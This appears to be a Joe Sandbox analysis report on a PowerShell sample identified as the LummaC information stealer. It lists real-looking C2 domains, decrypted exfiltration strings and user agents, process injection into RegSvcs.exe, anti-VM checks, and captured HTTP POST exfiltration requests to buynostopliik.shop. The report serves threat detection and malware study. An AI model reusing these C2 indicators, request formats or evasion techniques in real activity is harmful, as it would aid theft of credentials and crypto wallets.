Edit tour

Windows Analysis Report
87.247.158.212.ps1

Overview

General Information

Sample name:	87.247.158.212.ps1
Analysis ID:	1591125
MD5:	5259076d6fd45bf7ddbb866c169541db
SHA1:	67549b5a010f40a004558b2c250829c9dc4d869b
SHA256:	4154e02a0d922fefb72812b972808dbf6c3f0a9108f577b641c9a57cf8d8d342
Tags:	87-247-158-212ps1user-JAMESWT_MHT
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Sigma detected: Change PowerShell Policies to an Insecure Level

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

powershell.exe (PID: 7120 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\87.247.158.212.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 6480 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["kickykiduz.lat", "washyceehsu.lat", "savorraiykj.lat", "leggelatez.lat", "finickypwk.lat", "buynostopliik.shop", "shoefeatthe.lat", "miniatureyu.lat", "bloodyswif.lat"], "Build id": "NNaWCM--TEST"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: RegSvcs.exe PID: 6480	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\87.247.158.212.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\87.247.158.212.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\87.247.158.212.ps1", ProcessId: 7120, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\87.247.158.212.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\87.247.158.212.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\87.247.158.212.ps1", ProcessId: 7120, ProcessName: powershell.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T17:59:21.771472+0100	2028371	3	Unknown Traffic	192.168.2.6	49753	104.21.80.1	443	TCP
2025-01-14T17:59:23.210705+0100	2028371	3	Unknown Traffic	192.168.2.6	49762	104.21.80.1	443	TCP
2025-01-14T17:59:24.385499+0100	2028371	3	Unknown Traffic	192.168.2.6	49771	104.21.80.1	443	TCP
2025-01-14T17:59:26.805899+0100	2028371	3	Unknown Traffic	192.168.2.6	49788	104.21.80.1	443	TCP
2025-01-14T17:59:27.992894+0100	2028371	3	Unknown Traffic	192.168.2.6	49795	104.21.80.1	443	TCP
2025-01-14T17:59:29.294796+0100	2028371	3	Unknown Traffic	192.168.2.6	49805	104.21.80.1	443	TCP
2025-01-14T17:59:30.559974+0100	2028371	3	Unknown Traffic	192.168.2.6	49815	104.21.80.1	443	TCP
2025-01-14T17:59:34.190046+0100	2028371	3	Unknown Traffic	192.168.2.6	49834	104.21.80.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T17:59:22.592799+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49753	104.21.80.1	443	TCP
2025-01-14T17:59:23.710134+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49762	104.21.80.1	443	TCP
2025-01-14T17:59:34.671116+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49834	104.21.80.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T17:59:22.592799+0100	2049836	1	A Network Trojan was detected	192.168.2.6	49753	104.21.80.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T17:59:23.710134+0100	2049812	1	A Network Trojan was detected	192.168.2.6	49762	104.21.80.1	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T17:59:26.310956+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	49771	104.21.80.1	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 3.2.RegSvcs.exe.400000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["kickykiduz.lat", "washyceehsu.lat", "savorraiykj.lat", "leggelatez.lat", "finickypwk.lat", "buynostopliik.shop", "shoefeatthe.lat", "miniatureyu.lat", "bloodyswif.lat"], "Build id": "NNaWCM--TEST"}

Multi AV Scanner detection for submitted file

Source: 87.247.158.212.ps1

Virustotal: Detection: 8%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Sample uses string decryption to hide its real strings

Source: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: finickypwk.lat
Source: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: shoefeatthe.lat
Source: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: savorraiykj.lat
Source: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: kickykiduz.lat
Source: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: miniatureyu.lat
Source: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: leggelatez.lat
Source: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: washyceehsu.lat
Source: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: bloodyswif.lat
Source: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: buynostopliik.shop
Source: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: NNaWCM--TEST

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004182C0 CryptUnprotectData,	3_2_004182C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00415D15 CryptUnprotectData,	3_2_00415D15
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00418404 CryptUnprotectData,	3_2_00418404

Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49834 version: TLS 1.2

Source:

Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.2275070968.000002C180228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2309111430.000002C1E8BA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.2275070968.000002C1812DF000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+32DBB3B0h]	3_2_00427A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+edx+05CAF138h]	3_2_0040BA29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then push 00000000h	3_2_0040CB44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_0042D420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_00423E44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov esi, edx	3_2_00408740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp word ptr [eax+ebx+02h], 0000h	3_2_00429871
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [ebx], cl	3_2_0042E002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [ebx], cl	3_2_0042E002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov ecx, eax	3_2_0042A810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp eax	3_2_004288BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx esi, byte ptr [edx]	3_2_00402940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+0Eh]	3_2_0040A910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [esi+04h], eax	3_2_004161DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+esi+63115D0Dh]	3_2_004251E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then push dword ptr [esp+28h]	3_2_00426A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	3_2_00438AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov word ptr [ebx], cx	3_2_0041AA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov word ptr [esi], cx	3_2_0041AA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then lea eax, dword ptr [eax+eax*4]	3_2_004082A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+2564CAB9h]	3_2_0043EB00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov ecx, eax	3_2_00420B10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then push eax	3_2_00440310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov eax, dword ptr [00448B08h]	3_2_004273A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+1Ch]	3_2_004273A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then lea eax, dword ptr [esp+50h]	3_2_004273A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	3_2_0041DC40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ecx, byte ptr [ebx+eax]	3_2_00417451
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	3_2_00407400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	3_2_00407400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 7E3E42A0h	3_2_0043C410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then push esi	3_2_0043C410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	3_2_00415C25
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	3_2_0042B430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then add ebp, edi	3_2_00408CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov word ptr [edi], cx	3_2_00426D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [edx], cl	3_2_0042DD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ecx, byte ptr [edi+eax]	3_2_0042E5C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [esi+04h], eax	3_2_004165EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+eax]	3_2_00415590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov edx, ecx	3_2_004095A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [esi+04h], eax	3_2_00415E42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	3_2_00413E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	3_2_0040DE72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+79h]	3_2_00425E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+esi+63115D0Dh]	3_2_00425E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	3_2_0043EE10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_00408EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	3_2_0041DEB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+48h]	3_2_0041F710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-000000DEh]	3_2_0041F710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh	3_2_004427E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_0042E7EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 13884179h	3_2_0040DFEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_0042F799
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_0042DFAF

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49762 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49753 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49753 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49762 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49771 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49834 -> 104.21.80.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: kickykiduz.lat
Source: Malware configuration extractor	URLs: washyceehsu.lat
Source: Malware configuration extractor	URLs: savorraiykj.lat
Source: Malware configuration extractor	URLs: leggelatez.lat
Source: Malware configuration extractor	URLs: finickypwk.lat
Source: Malware configuration extractor	URLs: buynostopliik.shop
Source: Malware configuration extractor	URLs: shoefeatthe.lat
Source: Malware configuration extractor	URLs: miniatureyu.lat
Source: Malware configuration extractor	URLs: bloodyswif.lat

Source: Joe Sandbox View	IP Address: 104.21.80.1 104.21.80.1
Source: Joe Sandbox View	IP Address: 104.21.80.1 104.21.80.1

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49762 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49805 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49815 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49753 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49771 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49834 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49788 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49795 -> 104.21.80.1:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: buynostopliik.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 46Host: buynostopliik.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HQIAMERQIDZ9X5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12834Host: buynostopliik.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=04HQVGZ145User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15056Host: buynostopliik.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9P7THML6AU80QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19932Host: buynostopliik.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2VJBCZMYZ1C3W8T88MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1382Host: buynostopliik.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NMR2W5JOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570684Host: buynostopliik.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 81Host: buynostopliik.shop

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: buynostopliik.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: buynostopliik.shop

Source: powershell.exe, 00000000.00000002.2275070968.000002C181AEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2293833116.000002C19007F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2275070968.000002C181A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2309337491.000002C1E8D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2275070968.000002C180001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
